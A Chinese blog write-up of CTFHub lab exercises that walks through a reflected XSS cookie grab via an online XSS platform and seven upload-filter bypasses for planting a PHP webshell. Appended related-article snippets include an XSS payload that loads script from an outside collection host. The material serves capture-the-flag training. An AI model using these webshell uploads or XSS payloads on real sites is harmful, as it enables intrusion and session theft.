题解记录-CTFHub技能树|Web|XSS,文件上传

最新推荐文章于 2025-04-23 08:15:00 发布
最新推荐文章于 2025-04-23 08:15:00 发布
阅读量1.1k 收藏 4
点赞数 2
分类专栏: CTFHub技能树 文章标签: xss web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_57448435/article/details/126863911
版权

CTFHub技能树-Web-XSS,文件上传

文章目录

前言

在这里插入图片描述在这里插入图片描述

XSS

一、反射型

在这里插入图片描述 Send 即诱使别人点击我们留下的链接,然后在xss.pt接受返回的信息。
我们复制在xss平台构造好的恶意xss链接,让bot访问,从而在项目信息获得到bot的信息,即得到flag
在xss平台创建xss项目
在这里插入图片描述
将项目生成的代码复制到name

在这里插入图片描述
send后在项目内容里找到flag

在这里插入图片描述

文件上传

一、无验证

在这里插入图片描述无验证,直接上传一句话木马文件
在这里插入图片描述在这里插入图片描述
然后用蚁剑连接

在这里插入图片描述
url后加/upload/文件名,连接密码就是一句话木马里的字符
找到flag

在这里插入图片描述

二、前端验证

在这里插入图片描述bp抓包后发现,只接受.jpg,.png,.gif文件

在这里插入图片描述
将之前的php后缀名改为.png文件上传

在这里插入图片描述

在bp里将文件后缀名改回.php,forward,文件成功上传

在这里插入图片描述
用蚁剑连接,找到flag

在这里插入图片描述

三、.htaccess

题注:htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能
本题中,主要是利用.htaccess文件能将.png文件解析为.php文件
先上传一个.htaccess文件,意义是将.png解析为.php文件
在这里插入图片描述
然后上传之前的.png木马文件

在这里插入图片描述用蚁剑连接后,找到flag
在这里插入图片描述

四、MIME绕过

先上传.png文件

在这里插入图片描述
在bp中进行修改

在这里插入图片描述
forward后用蚁剑连接,找到flag

在这里插入图片描述

五、00截断

题注:了解一下 PHP 5.2 00截断上传的原理

在url中%00表示ascll码中的0 ,表示字符串结束,所以当url中出现%00时就会认为读取已结束。
利用此特点来用%00上传文件

先上传.png文件,然后用bp抓包进行修改
在这里插入图片描述
forward后用蚁剑连接,找到flag

在这里插入图片描述

六、双写后缀

本题会过滤一个php
于是上传一个.php文件,然后在bp里修改后缀为双写.pphphp,这样在过滤了一个php后,仍有一个php存在
在这里插入图片描述
forward上传成功,用蚁剑连接,找到flag

在这里插入图片描述

七、文件头检查

本题在上传时对文件进行了分析,检查了文件头,先上传一个正常的.png文件,然后在bp中删去部分后面内容,改为一句话木马,将文件后缀改成.php
在这里插入图片描述
forward上传成功后,用蚁剑连接,发现flag

在这里插入图片描述

总结

xss平台使用,修改后缀名、文件头、双写绕过,%00截断,.htaccess文件理解,bp与蚁剑工具的使用

CTFHub技能树webXSS
wzhwzh123321的博客
02-26 2827
XSS系列的题目中,由于需要使用能够接受XSS数据的平台,并且由于使用的是CTFHub的模拟机器人点击我们的虚假URL,因此使用的XSS平台不能是自己本地搭建的,如果是本地的模拟点击的机器人将无法访问我们给的这个URL地址,也就无法接收到我们想要的数据了,因此想解决本系列的题目,可以通过在线XSS平台或者自己使用服务器搭建一个XSS平台。可以看到可控的位置在53-55行中的这个位置,先闭合前面的单引号和<script>,然后再用一个<script>输入XSS代码,构造语句如下';第三题: DOM反射。
CTFHUB学习题解Web(3)- 密码口令与XSS
独沐晨霖
07-23 1712
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录密码口令弱口令默认口令XSS反射型 密码口令 弱口令 并不知道用户名和密码,用burp抓包 对用户名和密码进行cluster bomb模式爆破 爆破成功得到flag 默认口令 既然是默认口令就要查找这个“eYou邮件网关”的默认用户名和密码 登
CTFHUB-技能树-Web-XSS-反射型
Static______的博客
04-11 1956
参考链接:https://blog.youkuaiyun.com/weixin_43486981/article/details/107974878。特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话。输入admin后,会在页面显示,猜测可以通过该输入,改变页面内容。根据提示,把XSS平台给出的代码复制到第一个输入框中进行注入。提交后,在第二个框中访问第一个框注入XSS脚本后的网址。XSS platform平台,在上面注册一个账号。提交后,在XSS平台查看注入结果。
CTFHub技能树-XSS
最新发布
star3119391396的博客
04-23 491
可以利用js代码和 jQuery 的 $.getScript() 函数来异步加载并执行来自 xss平台 的 js 脚本,使用前提是网站引用了jQuery。区别于前面反射型xss的是,他建立恶意连接是在于每一次都要发送含恶意代码,而这个存储xss不需要,一旦发送过一次,以后每次访问它时,都会含有恶意代码。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。反射型,直接使用xss平台,将生成的地址传入第一个空。
ctfhub-技能树-xss题集全部习题详解-最新
weixin_73562787的博客
08-10 5701
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag。
CTFHub技能树 Web-XSS 详解
weixin_45808483的博客
11-15 3930
反射型 启动环境 我们在第一个框中输入 1 ,发现 hello后多了一个 1 ,这说明我们可以通过输入来更改页面内容 我们输入弹窗测试一下,发现成功弹窗 <script>alert(/xss/)</script> 我们将更改页面后的url输入第二个框,返回Successfully,猜测在后台进行访问。 这样的话我们就可以使用XSS platform平台。 下面这篇文章中向我们演示XSS platform的攻击测试。 Web安全XSS...
CTFHub技能树web——XSS——DOM反射
qq_48368964的博客
08-02 759
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中。根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式。然后去网页测试一下alert(1)反射。看到 确实存在 去xssaq.cn。
ctfhub web全部做题记录(持续跟新)
01-08
Web安全Web安全是网络安全的一个重要分支,主要关注Web应用程序的安全性,防止诸如SQL注入、XSS攻击、文件上传漏洞等威胁。 【信息泄露】信息泄露是指由于配置错误或不安全的设置导致敏感信息暴露。在描述中...
CTFHUB学习题解Web(1)- 前置技能(持续更新整理)
独沐晨霖
07-21 2327
注: 1. 因为是个入门题网站,若题目仅涉及简单的基础知识,就不截图了,仅简要说明过程 2. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 3. 大标题为版块名,小标题为含有题目的上级菜单名,无序黑体为题目名 Web HTTP协议 请求方式 众所周知,HTTP的请求方法是可以自定义的,用burp抓个包改一下请求方式为题目要求的CTFHUB就可以了 302重定向 打开网页用F12发现请求会被302重定向回index.html,用burp拦截并send to repeater即可得到fla
CTFHUB学习题解Web(4)-文件上传
独沐晨霖
07-28 709
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录无验证前端验证.htaccessMIME绕过文件头检查00截断双写后缀 无验证 无验证没啥说的,上传php脚本用蚁剑链接即可 前端验证 php文件不允许上传 查看网页源码 将脚本后缀改为.jpg上传并抓包把后缀名改回.php即可上传 用蚁剑连
CTFHub Web真题(3星-6星)
qq_43936524的博客
05-20 2257
三星难度Web题 afr-2 afr-1 提示文件包含 输入hello 回显hello world! 输入flag 回显no no no 又试了几个输入无回显 可以猜测输入的内容添加了后缀后显示出了文件内容 采用 php://filter/read=convert.base64-encode/resource=flag 成功读取flag.php内容 解码后得到flag n1book{afr_1_solved} checkin 扫目录只扫出了index.php一个页面,抓取响应包发现有flag字段
CTFHUB技能树XSS——反射型
weixin_73049307的博客
10-19 1711
在地址栏中可以看到有GET传参,正好对应第一个输入框的CTFHub,猜测是会通过第一个输入框来影响输出的内容(有个大大的“Hello,CTFHub”)出现“successfully”,第二个输入框应该是在后台访问注入的信息。(这里我就不新建了,之前新建过了)可以看到通过该输入,改变页面内容。(一般会有声音提醒上线了)
CTFHub——XSS
2302_79119987的博客
03-28 2062
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。
XSS-CTFHub
Keeping it fresh at all times.
02-04 1035
本文是CTFHub技能树Web系列的文章之一,重点学习了Web安全中的XSS漏洞。XSSWeb安全必学漏洞,需要多加训练、达到精通。
CTFHUB技能树XSS——存储型
weixin_73049307的博客
10-19 793
发现地址栏中的URL没有GET传参,而且这次是“Hello,no name”
ctfhubxss
小宇的web博客
05-22 1791
ctfhubxss 1.我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 解题流程 1.先在上面的what’s your name 输入JavaScript语句,发现出错只能使用xss平台在下面的对话框中进行xss漏洞注入。 这里先注册一下xss测试平
CTFHub技能书解题笔记-XSS-反射型
qq_43006864的博客
12-24 1998
打开题目 来个最常规的试试。 好像没思路了。看到第二行是说发送url去bot,第一行是你的名字。那我试试第二行放url。 返回了successfully。 然后没思路了。去看了大佬的wp,好像用到了xss平台,注册一个试试。 XSS平台 - (支持http/https)XSS Platform 这里我用的这个。 开始测试。注册完成后,创建项目。 这里随便√,默认的就够用了。 这里我们选择红框里的这一条,进行测试。 就贴在?name=后面...
CTF之旅(CTFHub技能树+详细Write up+已完结)(密码口令+XSS
weixin_51563603的博客
08-30 2061
目录其他CTFHub题目WriteUP地址前言密码口令弱口令 其他CTFHub题目WriteUP地址 本来不想分段的,但是后来发现要写的东西太多了,就分了几段写,大家见谅 1.web前置技能(已完结) 2.信息泄露(已完结) 前言 这里收录了我在CTFHub中做的题目和自己写的一些想法,首先我想稍微讲下个人经历,本人在今年寒假的时候初识CTF ,当时还在攻防世界上做了一些题目,但是后来有人跟我说攻防世界的题目比较老,建议我换个网站(这边没有诋毁攻 防世界的意思,每个人有每个人的想法),后来也因为学业较忙且
ctfhub 技能树web xss
01-10
### CTFHub Web技能树 XSS 学习路径和挑战 #### 了解XSS的基础概念 跨站脚本攻击(Cross-Site Scripting, XSS)是一种常见的Web安全漏洞,允许攻击者向其他用户的浏览器注入恶意脚本。这种类型的攻击可以分为三类:反射型XSS、存储型XSS以及基于DOM的XSS[^1]。 #### 掌握基本工具和技术 对于初学者来说,理解并掌握一些基础技术是非常重要的。例如,学会查看网页源代码中的HTML结构,通过开发者工具(F12)来分析页面加载过程中的请求响应数据流,特别是关注HTTP头部信息里的`Set-Cookie`字段及其属性设置情况,如`HttpOnly`, `Secure`, 和`SameSite`参数等[^4]。 #### 实践操作指南 为了更好地理解和应对不同形式下的XSS威胁,在实际环境中动手练习必不可少。可以从简单的实验环境开始尝试编写自定义的有效载荷(payload),逐步过渡到更复杂的场景模拟真实世界的攻击手法。值得注意的是,构建有效的XSS Payload通常依赖于JavaScript的知识水平;因此提高这方面的能力有助于创造更加巧妙且难以被防御机制识别出来的攻击方式[^2]。 #### 安全意识培养和社会工程学防范 除了技术和编码能力之外,还需要重视个人隐私保护与社会工程学方面的教育。比如当遇到未知来源的信息提示更改设备登录凭证时要保持警惕心态,并采取适当措施验证其合法性再做决定。此外,定期更新软件版本以修复已知的安全缺陷也是预防潜在风险的重要手段之一[^3]。 ```javascript // 示例Payload用于展示如何创建一个简单弹窗警告框 <script>alert('This is a test');</script> ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TTjsm1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值